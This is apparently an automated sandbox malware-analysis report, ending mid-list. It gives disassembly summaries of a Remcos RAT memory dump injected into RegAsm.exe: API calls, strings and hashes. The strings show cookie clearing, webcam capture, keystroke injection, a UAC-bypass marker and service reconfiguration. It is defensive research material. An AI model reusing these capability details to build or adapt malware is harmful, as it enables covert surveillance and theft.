                                                        Similarity
                                                        • String ID: tcp$udp
                                                        • API String ID: 0-3725065008
                                                        • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                        • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                                        • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 004018BE
                                                        • ExitThread.KERNEL32 ref: 004018F6
                                                        • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                        • String ID: PkG$XMG$NG$NG
                                                        • API String ID: 1649129571-3151166067
                                                        • Opcode ID: f17f11b8b39cffc117ffaa71cd5d18446726339bb65f1098d7a399b3bb622f5a
                                                        • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                                        • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 004079C5
                                                        • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • CloseHandle.KERNEL32(00000000), ref: 00407A4D
                                                        • MoveFileW.KERNEL32 ref: 00407A6A
                                                        • CloseHandle.KERNEL32(00000000), ref: 00407A95
                                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                                          • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                          • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                        • String ID: .part
                                                        • API String ID: 1303771098-3499674018
                                                        • Opcode ID: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                                                        • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                                        • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 004199CC
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 004199ED
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A0D
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A21
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A37
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A54
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A6F
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A8B
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: InputSend
                                                        • API String ID: 3431551938-0
                                                        • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                        • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                                        • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: __freea$__alloca_probe_16_free
                                                        • String ID: a/p$am/pm$zD
                                                        • API String ID: 2936374016-2723203690
                                                        • Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                                        • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                                        • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413B8B
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Enum$InfoQueryValue
                                                        • String ID: [regsplt]$xUG$TG
                                                        • API String ID: 3554306468-1165877943
                                                        • Opcode ID: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
                                                        • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                                        • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleCP.KERNEL32 ref: 0044B3FE
                                                        • __fassign.LIBCMT ref: 0044B479
                                                        • __fassign.LIBCMT ref: 0044B494
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000), ref: 0044B4D9
                                                        • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000), ref: 0044B512
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                        • API String ID: 1324828854-0
                                                        • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                        • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                                        • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: D[E$D[E
                                                        • API String ID: 269201875-3695742444
                                                        • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                        • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                                        • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                        • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegOpenKeyExW.ADVAPI32 ref: 00413D46
                                                          • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                          • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00413EB4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEnumInfoOpenQuerysend
                                                        • String ID: xUG$NG$NG$TG
                                                        • API String ID: 3114080316-2811732169
                                                        • Opcode ID: fc7062b0e2d73897183f332ff677a088385e4ff99dcd0168fd06527908a237fe
                                                        • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                                        • Opcode Fuzzy Hash: fc7062b0e2d73897183f332ff677a088385e4ff99dcd0168fd06527908a237fe
                                                        • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32 ref: 0041363D
                                                          • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                                          • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                        • _wcslen.LIBCMT ref: 0041B763
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                        • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                        • API String ID: 37874593-122982132
                                                        • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                                        • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                                        • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                                        • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                          • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                                                          • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                                        • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                        • API String ID: 1133728706-4073444585
                                                        • Opcode ID: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                                                        • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                                        • Opcode Fuzzy Hash: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                                                        • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                                        • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                                        • Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                                        • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                                        • _free.LIBCMT ref: 00450F48
                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                        • _free.LIBCMT ref: 00450F53
                                                        • _free.LIBCMT ref: 00450F5E
                                                        • _free.LIBCMT ref: 00450FB2
                                                        • _free.LIBCMT ref: 00450FBD
                                                        • _free.LIBCMT ref: 00450FC8
                                                        • _free.LIBCMT ref: 00450FD3
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                        • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                                        • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                        • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                                        • int.LIBCPMT ref: 00411183
                                                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                        • std::_Facet_Register.LIBCPMT ref: 004111C3
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                        • String ID: (mG
                                                        • API String ID: 2536120697-4059303827
                                                        • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                        • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                                        • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                        • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                                        • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLastValue___vcrt_
                                                        • String ID:
                                                        • API String ID: 3852720340-0
                                                        • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                        • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                                        • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                        • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CoInitializeEx.OLE32(00000000,00000002), ref: 004075D0
                                                          • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                                          • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                        • CoUninitialize.OLE32 ref: 00407629
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InitializeObjectUninitialize_wcslen
                                                        • String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                        • API String ID: 3851391207-2216821008
                                                        • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                        • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                                        • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                        • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                                        • GetLastError.KERNEL32 ref: 0040BAE7
                                                        Strings
                                                        • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                                        • UserProfile, xrefs: 0040BAAD
                                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                                        • [Chrome Cookies not found], xrefs: 0040BB01
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteErrorFileLast
                                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                        • API String ID: 2018770650-304995407
                                                        • Opcode ID: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                                        • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                                        • Opcode Fuzzy Hash: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                                        • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • AllocConsole.KERNEL32 ref: 0041CDA4
                                                        • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Console$AllocOutputShowWindow
                                                        • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                                        • API String ID: 2425139147-3065609815
                                                        • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                        • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                                        • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                        • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __allrem.LIBCMT ref: 0043AC69
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                                        • __allrem.LIBCMT ref: 0043AC9C
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                                        • __allrem.LIBCMT ref: 0043ACD1
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                        • String ID:
                                                        • API String ID: 1992179935-0
                                                        • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                        • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                                        • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                        • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                                          • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: H_prologSleep
                                                        • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                        • API String ID: 3469354165-3054508432
                                                        • Opcode ID: 675044920d57351bd4be636fd76d132256166d9fc3ead1ba86e83f4fd14bb599
                                                        • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                                        • Opcode Fuzzy Hash: 675044920d57351bd4be636fd76d132256166d9fc3ead1ba86e83f4fd14bb599
                                                        • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                                        • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 00411DA5
                                                        • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                                          • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                                          • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                                          • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                        • String ID:
                                                        • API String ID: 3950776272-0
                                                        • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                        • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                                        • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                        • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __cftoe
                                                        • String ID:
                                                        • API String ID: 4189289331-0
                                                        • Opcode ID: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                                        • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                                        • Opcode Fuzzy Hash: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                                        • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
